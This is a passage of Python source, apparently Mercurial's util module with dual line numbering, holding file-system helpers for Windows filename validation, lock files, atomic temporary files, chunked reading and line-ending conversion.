1675 1696 os.stat(os.path.dirname(dst)).st_dev)
1676 1697 settopic()
1677 1698
1678 1699 if hardlink:
1679 1700 try:
1680 1701 oslink(src, dst)
1681 1702 except (IOError, OSError):
1682 1703 hardlink = False
1683 1704 shutil.copy(src, dst)
1684 1705 else:
1685 1706 shutil.copy(src, dst)
1686 1707 num += 1
1687 1708 if progress:
1688 1709 progress.increment()
1689 1710
1690 1711 return hardlink, num
1691 1712
1692 1713 _winreservednames = {
1693 1714 'con', 'prn', 'aux', 'nul',
1694 1715 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1695 1716 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1696 1717 }
1697 1718 _winreservedchars = ':*?"<>|'
1698 1719 def checkwinfilename(path):
1699 1720 r'''Check that the base-relative path is a valid filename on Windows.
1700 1721 Returns None if the path is ok, or a UI string describing the problem.
1701 1722
1702 1723 >>> checkwinfilename(b"just/a/normal/path")
1703 1724 >>> checkwinfilename(b"foo/bar/con.xml")
1704 1725 "filename contains 'con', which is reserved on Windows"
1705 1726 >>> checkwinfilename(b"foo/con.xml/bar")
1706 1727 "filename contains 'con', which is reserved on Windows"
1707 1728 >>> checkwinfilename(b"foo/bar/xml.con")
1708 1729 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1709 1730 "filename contains 'AUX', which is reserved on Windows"
1710 1731 >>> checkwinfilename(b"foo/bar/bla:.txt")
1711 1732 "filename contains ':', which is reserved on Windows"
1712 1733 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1713 1734 "filename contains '\\x07', which is invalid on Windows"
1714 1735 >>> checkwinfilename(b"foo/bar/bla ")
1715 1736 "filename ends with ' ', which is not allowed on Windows"
1716 1737 >>> checkwinfilename(b"../bar")
1717 1738 >>> checkwinfilename(b"foo\\")
1718 1739 "filename ends with '\\', which is invalid on Windows"
1719 1740 >>> checkwinfilename(b"foo\\/bar")
1720 1741 "directory name ends with '\\', which is invalid on Windows"
1721 1742 '''
1722 1743 if path.endswith('\\'):
1723 1744 return _("filename ends with '\\', which is invalid on Windows")
1724 1745 if '\\/' in path:
1725 1746 return _("directory name ends with '\\', which is invalid on Windows")
1726 1747 for n in path.replace('\\', '/').split('/'):
1727 1748 if not n:
1728 1749 continue
1729 1750 for c in _filenamebytestr(n):
1730 1751 if c in _winreservedchars:
1731 1752 return _("filename contains '%s', which is reserved "
1732 1753 "on Windows") % c
1733 1754 if ord(c) <= 31:
1734 1755 return _("filename contains '%s', which is invalid "
1735 1756 "on Windows") % stringutil.escapestr(c)
1736 1757 base = n.split('.')[0]
1737 1758 if base and base.lower() in _winreservednames:
1738 1759 return _("filename contains '%s', which is reserved "
1739 1760 "on Windows") % base
1740 1761 t = n[-1:]
1741 1762 if t in '. ' and n not in '..':
1742 1763 return _("filename ends with '%s', which is not allowed "
1743 1764 "on Windows") % t
1744 1765
1745 1766 if pycompat.iswindows:
1746 1767 checkosfilename = checkwinfilename
1747 1768 timer = time.clock
1748 1769 else:
1749 1770 checkosfilename = platform.checkosfilename
1750 1771 timer = time.time
1751 1772
1752 1773 if safehasattr(time, "perf_counter"):
1753 1774 timer = time.perf_counter
1754 1775
1755 1776 def makelock(info, pathname):
1756 1777 """Create a lock file atomically if possible
1757 1778
1758 1779 This may leave a stale lock file if symlink isn't supported and signal
1759 1780 interrupt is enabled.
1760 1781 """
1761 1782 try:
1762 1783 return os.symlink(info, pathname)
1763 1784 except OSError as why:
1764 1785 if why.errno == errno.EEXIST:
1765 1786 raise
1766 1787 except AttributeError: # no symlink in os
1767 1788 pass
1768 1789
1769 1790 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1770 1791 ld = os.open(pathname, flags)
1771 1792 os.write(ld, info)
1772 1793 os.close(ld)
1773 1794
1774 1795 def readlock(pathname):
1775 1796 try:
1776 1797 return os.readlink(pathname)
1777 1798 except OSError as why:
1778 1799 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1779 1800 raise
1780 1801 except AttributeError: # no symlink in os
1781 1802 pass
1782 1803 fp = posixfile(pathname, 'rb')
1783 1804 r = fp.read()
1784 1805 fp.close()
1785 1806 return r
1786 1807
1787 1808 def fstat(fp):
1788 1809 '''stat file object that may not have fileno method.'''
1789 1810 try:
1790 1811 return os.fstat(fp.fileno())
1791 1812 except AttributeError:
1792 1813 return os.stat(fp.name)
1793 1814
1794 1815 # File system features
1795 1816
1796 1817 def fscasesensitive(path):
1797 1818 """
1798 1819 Return true if the given path is on a case-sensitive filesystem
1799 1820
1800 1821 Requires a path (like /foo/.hg) ending with a foldable final
1801 1822 directory component.
1802 1823 """
1803 1824 s1 = os.lstat(path)
1804 1825 d, b = os.path.split(path)
1805 1826 b2 = b.upper()
1806 1827 if b == b2:
1807 1828 b2 = b.lower()
1808 1829 if b == b2:
1809 1830 return True # no evidence against case sensitivity
1810 1831 p2 = os.path.join(d, b2)
1811 1832 try:
1812 1833 s2 = os.lstat(p2)
1813 1834 if s2 == s1:
1814 1835 return False
1815 1836 return True
1816 1837 except OSError:
1817 1838 return True
1818 1839
1819 1840 try:
1820 1841 import re2
1821 1842 _re2 = None
1822 1843 except ImportError:
1823 1844 _re2 = False
1824 1845
1825 1846 class _re(object):
1826 1847 def _checkre2(self):
1827 1848 global _re2
1828 1849 try:
1829 1850 # check if match works, see issue3964
1830 1851 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1831 1852 except ImportError:
1832 1853 _re2 = False
1833 1854
1834 1855 def compile(self, pat, flags=0):
1835 1856 '''Compile a regular expression, using re2 if possible
1836 1857
1837 1858 For best performance, use only re2-compatible regexp features. The
1838 1859 only flags from the re module that are re2-compatible are
1839 1860 IGNORECASE and MULTILINE.'''
1840 1861 if _re2 is None:
1841 1862 self._checkre2()
1842 1863 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1843 1864 if flags & remod.IGNORECASE:
1844 1865 pat = '(?i)' + pat
1845 1866 if flags & remod.MULTILINE:
1846 1867 pat = '(?m)' + pat
1847 1868 try:
1848 1869 return re2.compile(pat)
1849 1870 except re2.error:
1850 1871 pass
1851 1872 return remod.compile(pat, flags)
1852 1873
1853 1874 @propertycache
1854 1875 def escape(self):
1855 1876 '''Return the version of escape corresponding to self.compile.
1856 1877
1857 1878 This is imperfect because whether re2 or re is used for a particular
1858 1879 function depends on the flags, etc, but it's the best we can do.
1859 1880 '''
1860 1881 global _re2
1861 1882 if _re2 is None:
1862 1883 self._checkre2()
1863 1884 if _re2:
1864 1885 return re2.escape
1865 1886 else:
1866 1887 return remod.escape
1867 1888
1868 1889 re = _re()
1869 1890
1870 1891 _fspathcache = {}
1871 1892 def fspath(name, root):
1872 1893 '''Get name in the case stored in the filesystem
1873 1894
1874 1895 The name should be relative to root, and be normcase-ed for efficiency.
1875 1896
1876 1897 Note that this function is unnecessary, and should not be
1877 1898 called, for case-sensitive filesystems (simply because it's expensive).
1878 1899
1879 1900 The root should be normcase-ed, too.
1880 1901 '''
1881 1902 def _makefspathcacheentry(dir):
1882 1903 return dict((normcase(n), n) for n in os.listdir(dir))
1883 1904
1884 1905 seps = pycompat.ossep
1885 1906 if pycompat.osaltsep:
1886 1907 seps = seps + pycompat.osaltsep
1887 1908 # Protect backslashes. This gets silly very quickly.
1888 1909 seps.replace('\\','\\\\')
1889 1910 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1890 1911 dir = os.path.normpath(root)
1891 1912 result = []
1892 1913 for part, sep in pattern.findall(name):
1893 1914 if sep:
1894 1915 result.append(sep)
1895 1916 continue
1896 1917
1897 1918 if dir not in _fspathcache:
1898 1919 _fspathcache[dir] = _makefspathcacheentry(dir)
1899 1920 contents = _fspathcache[dir]
1900 1921
1901 1922 found = contents.get(part)
1902 1923 if not found:
1903 1924 # retry "once per directory" per "dirstate.walk" which
1904 1925 # may take place for each patches of "hg qpush", for example
1905 1926 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1906 1927 found = contents.get(part)
1907 1928
1908 1929 result.append(found or part)
1909 1930 dir = os.path.join(dir, part)
1910 1931
1911 1932 return ''.join(result)
1912 1933
1913 1934 def checknlink(testfile):
1914 1935 '''check whether hardlink count reporting works properly'''
1915 1936
1916 1937 # testfile may be open, so we need a separate file for checking to
1917 1938 # work around issue2543 (or testfile may get lost on Samba shares)
1918 1939 f1, f2, fp = None, None, None
1919 1940 try:
1920 1941 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1921 1942 suffix='1~', dir=os.path.dirname(testfile))
1922 1943 os.close(fd)
1923 1944 f2 = '%s2~' % f1[:-2]
1924 1945
1925 1946 oslink(f1, f2)
1926 1947 # nlinks() may behave differently for files on Windows shares if
1927 1948 # the file is open.
1928 1949 fp = posixfile(f2)
1929 1950 return nlinks(f2) > 1
1930 1951 except OSError:
1931 1952 return False
1932 1953 finally:
1933 1954 if fp is not None:
1934 1955 fp.close()
1935 1956 for f in (f1, f2):
1936 1957 try:
1937 1958 if f is not None:
1938 1959 os.unlink(f)
1939 1960 except OSError:
1940 1961 pass
1941 1962
1942 1963 def endswithsep(path):
1943 1964 '''Check path ends with os.sep or os.altsep.'''
1944 1965 return (path.endswith(pycompat.ossep)
1945 1966 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1946 1967
1947 1968 def splitpath(path):
1948 1969 '''Split path by os.sep.
1949 1970 Note that this function does not use os.altsep because this is
1950 1971 an alternative of simple "xxx.split(os.sep)".
1951 1972 It is recommended to use os.path.normpath() before using this
1952 1973 function if need.'''
1953 1974 return path.split(pycompat.ossep)
1954 1975
1955 1976 def mktempcopy(name, emptyok=False, createmode=None):
1956 1977 """Create a temporary file with the same contents from name
1957 1978
1958 1979 The permission bits are copied from the original file.
1959 1980
1960 1981 If the temporary file is going to be truncated immediately, you
1961 1982 can use emptyok=True as an optimization.
1962 1983
1963 1984 Returns the name of the temporary file.
1964 1985 """
1965 1986 d, fn = os.path.split(name)
1966 1987 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1967 1988 os.close(fd)
1968 1989 # Temporary files are created with mode 0600, which is usually not
1969 1990 # what we want. If the original file already exists, just copy
1970 1991 # its mode. Otherwise, manually obey umask.
1971 1992 copymode(name, temp, createmode)
1972 1993 if emptyok:
1973 1994 return temp
1974 1995 try:
1975 1996 try:
1976 1997 ifp = posixfile(name, "rb")
1977 1998 except IOError as inst:
1978 1999 if inst.errno == errno.ENOENT:
1979 2000 return temp
1980 2001 if not getattr(inst, 'filename', None):
1981 2002 inst.filename = name
1982 2003 raise
1983 2004 ofp = posixfile(temp, "wb")
1984 2005 for chunk in filechunkiter(ifp):
1985 2006 ofp.write(chunk)
1986 2007 ifp.close()
1987 2008 ofp.close()
1988 2009 except: # re-raises
1989 2010 try:
1990 2011 os.unlink(temp)
1991 2012 except OSError:
1992 2013 pass
1993 2014 raise
1994 2015 return temp
1995 2016
1996 2017 class filestat(object):
1997 2018 """help to exactly detect change of a file
1998 2019
1999 2020 'stat' attribute is result of 'os.stat()' if specified 'path'
2000 2021 exists. Otherwise, it is None. This can avoid preparative
2001 2022 'exists()' examination on client side of this class.
2002 2023 """
2003 2024 def __init__(self, stat):
2004 2025 self.stat = stat
2005 2026
2006 2027 @classmethod
2007 2028 def frompath(cls, path):
2008 2029 try:
2009 2030 stat = os.stat(path)
2010 2031 except OSError as err:
2011 2032 if err.errno != errno.ENOENT:
2012 2033 raise
2013 2034 stat = None
2014 2035 return cls(stat)
2015 2036
2016 2037 @classmethod
2017 2038 def fromfp(cls, fp):
2018 2039 stat = os.fstat(fp.fileno())
2019 2040 return cls(stat)
2020 2041
2021 2042 __hash__ = object.__hash__
2022 2043
2023 2044 def __eq__(self, old):
2024 2045 try:
2025 2046 # if ambiguity between stat of new and old file is
2026 2047 # avoided, comparison of size, ctime and mtime is enough
2027 2048 # to exactly detect change of a file regardless of platform
2028 2049 return (self.stat.st_size == old.stat.st_size and
2029 2050 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2030 2051 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2031 2052 except AttributeError:
2032 2053 pass
2033 2054 try:
2034 2055 return self.stat is None and old.stat is None
2035 2056 except AttributeError:
2036 2057 return False
2037 2058
2038 2059 def isambig(self, old):
2039 2060 """Examine whether new (= self) stat is ambiguous against old one
2040 2061
2041 2062 "S[N]" below means stat of a file at N-th change:
2042 2063
2043 2064 - S[n-1].ctime < S[n].ctime: can detect change of a file
2044 2065 - S[n-1].ctime == S[n].ctime
2045 2066 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2046 2067 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2047 2068 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2048 2069 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2049 2070
2050 2071 Case (*2) above means that a file was changed twice or more at
2051 2072 same time in sec (= S[n-1].ctime), and comparison of timestamp
2052 2073 is ambiguous.
2053 2074
2054 2075 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2055 2076 timestamp is ambiguous".
2056 2077
2057 2078 But advancing mtime only in case (*2) doesn't work as
2058 2079 expected, because naturally advanced S[n].mtime in case (*1)
2059 2080 might be equal to manually advanced S[n-1 or earlier].mtime.
2060 2081
2061 2082 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2062 2083 treated as ambiguous regardless of mtime, to avoid overlooking
2063 2084 by confliction between such mtime.
2064 2085
2065 2086 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2066 2087 S[n].mtime", even if size of a file isn't changed.
2067 2088 """
2068 2089 try:
2069 2090 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2070 2091 except AttributeError:
2071 2092 return False
2072 2093
2073 2094 def avoidambig(self, path, old):
2074 2095 """Change file stat of specified path to avoid ambiguity
2075 2096
2076 2097 'old' should be previous filestat of 'path'.
2077 2098
2078 2099 This skips avoiding ambiguity, if a process doesn't have
2079 2100 appropriate privileges for 'path'. This returns False in this
2080 2101 case.
2081 2102
2082 2103 Otherwise, this returns True, as "ambiguity is avoided".
2083 2104 """
2084 2105 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2085 2106 try:
2086 2107 os.utime(path, (advanced, advanced))
2087 2108 except OSError as inst:
2088 2109 if inst.errno == errno.EPERM:
2089 2110 # utime() on the file created by another user causes EPERM,
2090 2111 # if a process doesn't have appropriate privileges
2091 2112 return False
2092 2113 raise
2093 2114 return True
2094 2115
2095 2116 def __ne__(self, other):
2096 2117 return not self == other
2097 2118
2098 2119 class atomictempfile(object):
2099 2120 '''writable file object that atomically updates a file
2100 2121
2101 2122 All writes will go to a temporary copy of the original file. Call
2102 2123 close() when you are done writing, and atomictempfile will rename
2103 2124 the temporary copy to the original name, making the changes
2104 2125 visible. If the object is destroyed without being closed, all your
2105 2126 writes are discarded.
2106 2127
2107 2128 checkambig argument of constructor is used with filestat, and is
2108 2129 useful only if target file is guarded by any lock (e.g. repo.lock
2109 2130 or repo.wlock).
2110 2131 '''
2111 2132 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2112 2133 self.__name = name # permanent name
2113 2134 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2114 2135 createmode=createmode)
2115 2136 self._fp = posixfile(self._tempname, mode)
2116 2137 self._checkambig = checkambig
2117 2138
2118 2139 # delegated methods
2119 2140 self.read = self._fp.read
2120 2141 self.write = self._fp.write
2121 2142 self.seek = self._fp.seek
2122 2143 self.tell = self._fp.tell
2123 2144 self.fileno = self._fp.fileno
2124 2145
2125 2146 def close(self):
2126 2147 if not self._fp.closed:
2127 2148 self._fp.close()
2128 2149 filename = localpath(self.__name)
2129 2150 oldstat = self._checkambig and filestat.frompath(filename)
2130 2151 if oldstat and oldstat.stat:
2131 2152 rename(self._tempname, filename)
2132 2153 newstat = filestat.frompath(filename)
2133 2154 if newstat.isambig(oldstat):
2134 2155 # stat of changed file is ambiguous to original one
2135 2156 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2136 2157 os.utime(filename, (advanced, advanced))
2137 2158 else:
2138 2159 rename(self._tempname, filename)
2139 2160
2140 2161 def discard(self):
2141 2162 if not self._fp.closed:
2142 2163 try:
2143 2164 os.unlink(self._tempname)
2144 2165 except OSError:
2145 2166 pass
2146 2167 self._fp.close()
2147 2168
2148 2169 def __del__(self):
2149 2170 if safehasattr(self, '_fp'): # constructor actually did something
2150 2171 self.discard()
2151 2172
2152 2173 def __enter__(self):
2153 2174 return self
2154 2175
2155 2176 def __exit__(self, exctype, excvalue, traceback):
2156 2177 if exctype is not None:
2157 2178 self.discard()
2158 2179 else:
2159 2180 self.close()
2160 2181
2161 2182 def unlinkpath(f, ignoremissing=False, rmdir=True):
2162 2183 """unlink and remove the directory if it is empty"""
2163 2184 if ignoremissing:
2164 2185 tryunlink(f)
2165 2186 else:
2166 2187 unlink(f)
2167 2188 if rmdir:
2168 2189 # try removing directories that might now be empty
2169 2190 try:
2170 2191 removedirs(os.path.dirname(f))
2171 2192 except OSError:
2172 2193 pass
2173 2194
2174 2195 def tryunlink(f):
2175 2196 """Attempt to remove a file, ignoring ENOENT errors."""
2176 2197 try:
2177 2198 unlink(f)
2178 2199 except OSError as e:
2179 2200 if e.errno != errno.ENOENT:
2180 2201 raise
2181 2202
2182 2203 def makedirs(name, mode=None, notindexed=False):
2183 2204 """recursive directory creation with parent mode inheritance
2184 2205
2185 2206 Newly created directories are marked as "not to be indexed by
2186 2207 the content indexing service", if ``notindexed`` is specified
2187 2208 for "write" mode access.
2188 2209 """
2189 2210 try:
2190 2211 makedir(name, notindexed)
2191 2212 except OSError as err:
2192 2213 if err.errno == errno.EEXIST:
2193 2214 return
2194 2215 if err.errno != errno.ENOENT or not name:
2195 2216 raise
2196 2217 parent = os.path.dirname(os.path.abspath(name))
2197 2218 if parent == name:
2198 2219 raise
2199 2220 makedirs(parent, mode, notindexed)
2200 2221 try:
2201 2222 makedir(name, notindexed)
2202 2223 except OSError as err:
2203 2224 # Catch EEXIST to handle races
2204 2225 if err.errno == errno.EEXIST:
2205 2226 return
2206 2227 raise
2207 2228 if mode is not None:
2208 2229 os.chmod(name, mode)
2209 2230
2210 2231 def readfile(path):
2211 2232 with open(path, 'rb') as fp:
2212 2233 return fp.read()
2213 2234
2214 2235 def writefile(path, text):
2215 2236 with open(path, 'wb') as fp:
2216 2237 fp.write(text)
2217 2238
2218 2239 def appendfile(path, text):
2219 2240 with open(path, 'ab') as fp:
2220 2241 fp.write(text)
2221 2242
2222 2243 class chunkbuffer(object):
2223 2244 """Allow arbitrary sized chunks of data to be efficiently read from an
2224 2245 iterator over chunks of arbitrary size."""
2225 2246
2226 2247 def __init__(self, in_iter):
2227 2248 """in_iter is the iterator that's iterating over the input chunks."""
2228 2249 def splitbig(chunks):
2229 2250 for chunk in chunks:
2230 2251 if len(chunk) > 2**20:
2231 2252 pos = 0
2232 2253 while pos < len(chunk):
2233 2254 end = pos + 2 ** 18
2234 2255 yield chunk[pos:end]
2235 2256 pos = end
2236 2257 else:
2237 2258 yield chunk
2238 2259 self.iter = splitbig(in_iter)
2239 2260 self._queue = collections.deque()
2240 2261 self._chunkoffset = 0
2241 2262
2242 2263 def read(self, l=None):
2243 2264 """Read L bytes of data from the iterator of chunks of data.
2244 2265 Returns less than L bytes if the iterator runs dry.
2245 2266
2246 2267 If size parameter is omitted, read everything"""
2247 2268 if l is None:
2248 2269 return ''.join(self.iter)
2249 2270
2250 2271 left = l
2251 2272 buf = []
2252 2273 queue = self._queue
2253 2274 while left > 0:
2254 2275 # refill the queue
2255 2276 if not queue:
2256 2277 target = 2**18
2257 2278 for chunk in self.iter:
2258 2279 queue.append(chunk)
2259 2280 target -= len(chunk)
2260 2281 if target <= 0:
2261 2282 break
2262 2283 if not queue:
2263 2284 break
2264 2285
2265 2286 # The easy way to do this would be to queue.popleft(), modify the
2266 2287 # chunk (if necessary), then queue.appendleft(). However, for cases
2267 2288 # where we read partial chunk content, this incurs 2 dequeue
2268 2289 # mutations and creates a new str for the remaining chunk in the
2269 2290 # queue. Our code below avoids this overhead.
2270 2291
2271 2292 chunk = queue[0]
2272 2293 chunkl = len(chunk)
2273 2294 offset = self._chunkoffset
2274 2295
2275 2296 # Use full chunk.
2276 2297 if offset == 0 and left >= chunkl:
2277 2298 left -= chunkl
2278 2299 queue.popleft()
2279 2300 buf.append(chunk)
2280 2301 # self._chunkoffset remains at 0.
2281 2302 continue
2282 2303
2283 2304 chunkremaining = chunkl - offset
2284 2305
2285 2306 # Use all of unconsumed part of chunk.
2286 2307 if left >= chunkremaining:
2287 2308 left -= chunkremaining
2288 2309 queue.popleft()
2289 2310 # offset == 0 is enabled by block above, so this won't merely
2290 2311 # copy via ``chunk[0:]``.
2291 2312 buf.append(chunk[offset:])
2292 2313 self._chunkoffset = 0
2293 2314
2294 2315 # Partial chunk needed.
2295 2316 else:
2296 2317 buf.append(chunk[offset:offset + left])
2297 2318 self._chunkoffset += left
2298 2319 left -= chunkremaining
2299 2320
2300 2321 return ''.join(buf)
2301 2322
2302 2323 def filechunkiter(f, size=131072, limit=None):
2303 2324 """Create a generator that produces the data in the file size
2304 2325 (default 131072) bytes at a time, up to optional limit (default is
2305 2326 to read all data). Chunks may be less than size bytes if the
2306 2327 chunk is the last chunk in the file, or the file is a socket or
2307 2328 some other type of file that sometimes reads less data than is
2308 2329 requested."""
2309 2330 assert size >= 0
2310 2331 assert limit is None or limit >= 0
2311 2332 while True:
2312 2333 if limit is None:
2313 2334 nbytes = size
2314 2335 else:
2315 2336 nbytes = min(limit, size)
2316 2337 s = nbytes and f.read(nbytes)
2317 2338 if not s:
2318 2339 break
2319 2340 if limit:
2320 2341 limit -= len(s)
2321 2342 yield s
2322 2343
2323 2344 class cappedreader(object):
2324 2345 """A file object proxy that allows reading up to N bytes.
2325 2346
2326 2347 Given a source file object, instances of this type allow reading up to
2327 2348 N bytes from that source file object. Attempts to read past the allowed
2328 2349 limit are treated as EOF.
2329 2350
2330 2351 It is assumed that I/O is not performed on the original file object
2331 2352 in addition to I/O that is performed by this instance. If there is,
2332 2353 state tracking will get out of sync and unexpected results will ensue.
2333 2354 """
2334 2355 def __init__(self, fh, limit):
2335 2356 """Allow reading up to <limit> bytes from <fh>."""
2336 2357 self._fh = fh
2337 2358 self._left = limit
2338 2359
2339 2360 def read(self, n=-1):
2340 2361 if not self._left:
2341 2362 return b''
2342 2363
2343 2364 if n < 0:
2344 2365 n = self._left
2345 2366
2346 2367 data = self._fh.read(min(n, self._left))
2347 2368 self._left -= len(data)
2348 2369 assert self._left >= 0
2349 2370
2350 2371 return data
2351 2372
2352 2373 def readinto(self, b):
2353 2374 res = self.read(len(b))
2354 2375 if res is None:
2355 2376 return None
2356 2377
2357 2378 b[0:len(res)] = res
2358 2379 return len(res)
2359 2380
2360 2381 def unitcountfn(*unittable):
2361 2382 '''return a function that renders a readable count of some quantity'''
2362 2383
2363 2384 def go(count):
2364 2385 for multiplier, divisor, format in unittable:
2365 2386 if abs(count) >= divisor * multiplier:
2366 2387 return format % (count / float(divisor))
2367 2388 return unittable[-1][2] % count
2368 2389
2369 2390 return go
2370 2391
2371 2392 def processlinerange(fromline, toline):
2372 2393 """Check that linerange <fromline>:<toline> makes sense and return a
2373 2394 0-based range.
2374 2395
2375 2396 >>> processlinerange(10, 20)
2376 2397 (9, 20)
2377 2398 >>> processlinerange(2, 1)
2378 2399 Traceback (most recent call last):
2379 2400 ...
2380 2401 ParseError: line range must be positive
2381 2402 >>> processlinerange(0, 5)
2382 2403 Traceback (most recent call last):
2383 2404 ...
2384 2405 ParseError: fromline must be strictly positive
2385 2406 """
2386 2407 if toline - fromline < 0:
2387 2408 raise error.ParseError(_("line range must be positive"))
2388 2409 if fromline < 1:
2389 2410 raise error.ParseError(_("fromline must be strictly positive"))
2390 2411 return fromline - 1, toline
2391 2412
2392 2413 bytecount = unitcountfn(
2393 2414 (100, 1 << 30, _('%.0f GB')),
2394 2415 (10, 1 << 30, _('%.1f GB')),
2395 2416 (1, 1 << 30, _('%.2f GB')),
2396 2417 (100, 1 << 20, _('%.0f MB')),
2397 2418 (10, 1 << 20, _('%.1f MB')),
2398 2419 (1, 1 << 20, _('%.2f MB')),
2399 2420 (100, 1 << 10, _('%.0f KB')),
2400 2421 (10, 1 << 10, _('%.1f KB')),
2401 2422 (1, 1 << 10, _('%.2f KB')),
2402 2423 (1, 1, _('%.0f bytes')),
2403 2424 )
2404 2425
2405 2426 class transformingwriter(object):
2406 2427 """Writable file wrapper to transform data by function"""
2407 2428
2408 2429 def __init__(self, fp, encode):
2409 2430 self._fp = fp
2410 2431 self._encode = encode
2411 2432
2412 2433 def close(self):
2413 2434 self._fp.close()
2414 2435
2415 2436 def flush(self):
2416 2437 self._fp.flush()
2417 2438
2418 2439 def write(self, data):
2419 2440 return self._fp.write(self._encode(data))
2420 2441
2421 2442 # Matches a single EOL which can either be a CRLF where repeated CR
2422 2443 # are removed or a LF. We do not care about old Macintosh files, so a
2423 2444 # stray CR is an error.
2424 2445 _eolre = remod.compile(br'\r*\n')
2425 2446
2426 2447 def tolf(s):
2427 2448 return _eolre.sub('\n', s)
2428 2449
2429 2450 def tocrlf(s):
2430 2451 return _eolre.sub('\r\n', s)
2431 2452
2432 2453 def _crlfwriter(fp):
2433 2454 return transformingwriter(fp, tocrlf)
2434 2455
2435 2456 if pycompat.oslinesep == '\r\n':
2436 2457 tonativeeol = tocrlf
2437 2458 fromnativeeol = tolf
2438 2459 nativeeolwriter = _crlfwriter
2439 2460 else:
2440 2461 tonativeeol = pycompat.identity
2441 2462 fromnativeeol = pycompat.identity
2442 2463 nativeeolwriter = pycompat.identity
2443 2464
2444 2465 if (pyplatform.python_implementation() == 'CPython' and
2445 2466 sys.version_info < (3, 0)):
2446 2467 # There is an issue in CPython that some IO methods do not handle EINTR
2447 2468 # correctly. The following table shows what CPython version (and functions)
2448 2469 # are affected (buggy: has the EINTR bug, okay: otherwise):
2449 2470 #
2450 2471 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2451 2472 # --------------------------------------------------
2452 2473 # fp.__iter__ | buggy | buggy | okay
2453 2474 # fp.read* | buggy | okay [1] | okay
2454 2475 #
2455 2476 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2456 2477 #
2457 2478 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2458 2479 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2459 2480 #
2460 2481 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2461 2482 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2462 2483 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2463 2484 # fp.__iter__ but not other fp.read* methods.
2464 2485 #
2465 2486 # On modern systems like Linux, the "read" syscall cannot be interrupted
2466 2487 # when reading "fast" files like on-disk files. So the EINTR issue only
2467 2488 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2468 2489 # files approximately as "fast" files and use the fast (unsafe) code path,
2469 2490 # to minimize the performance impact.
2470 2491 if sys.version_info >= (2, 7, 4):
2471 2492 # fp.readline deals with EINTR correctly, use it as a workaround.
2472 2493 def _safeiterfile(fp):
2473 2494 return iter(fp.readline, '')
2474 2495 else:
2475 2496 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2476 2497 # note: this may block longer than necessary because of bufsize.
2477 2498 def _safeiterfile(fp, bufsize=4096):
2478 2499 fd = fp.fileno()
2479 2500 line = ''
2480 2501 while True:
2481 2502 try:
2482 2503 buf = os.read(fd, bufsize)
2483 2504 except OSError as ex:
2484 2505 # os.read only raises EINTR before any data is read
2485 2506 if ex.errno == errno.EINTR:
2486 2507 continue
2487 2508 else:
2488 2509 raise
2489 2510 line += buf
2490 2511 if '\n' in buf:
2491 2512 splitted = line.splitlines(True)
2492 2513 line = ''
2493 2514 for l in splitted:
2494 2515 if l[-1] == '\n':
2495 2516 yield l
2496 2517 else:
2497 2518 line = l
2498 2519 if not buf:
2499 2520 break
2500 2521 if line:
2501 2522 yield line
2502 2523
2503 2524 def iterfile(fp):
2504 2525 fastpath = True
2505 2526 if type(fp) is file:
2506 2527 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2507 2528 if fastpath:
2508 2529 return fp
2509 2530 else:
2510 2531 return _safeiterfile(fp)
2511 2532 else:
2512 2533 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2513 2534 def iterfile(fp):
2514 2535 return fp
2515 2536
2516 2537 def iterlines(iterator):
2517 2538 for chunk in iterator:
2518 2539 for line in chunk.splitlines():
2519 2540 yield line
2520 2541
2521 2542 def expandpath(path):
2522 2543 return os.path.expanduser(os.path.expandvars(path))
2523 2544
2524 2545 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2525 2546 """Return the result of interpolating items in the mapping into string s.
2526 2547
2527 2548 prefix is a single character string, or a two character string with
2528 2549 a backslash as the first character if the prefix needs to be escaped in
2529 2550 a regular expression.
2530 2551
2531 2552 fn is an optional function that will be applied to the replacement text
2532 2553 just before replacement.
2533 2554
2534 2555 escape_prefix is an optional flag that allows using doubled prefix for
2535 2556 its escaping.
2536 2557 """
2537 2558 fn = fn or (lambda s: s)
2538 2559 patterns = '|'.join(mapping.keys())
2539 2560 if escape_prefix:
2540 2561 patterns += '|' + prefix
2541 2562 if len(prefix) > 1:
2542 2563 prefix_char = prefix[1:]
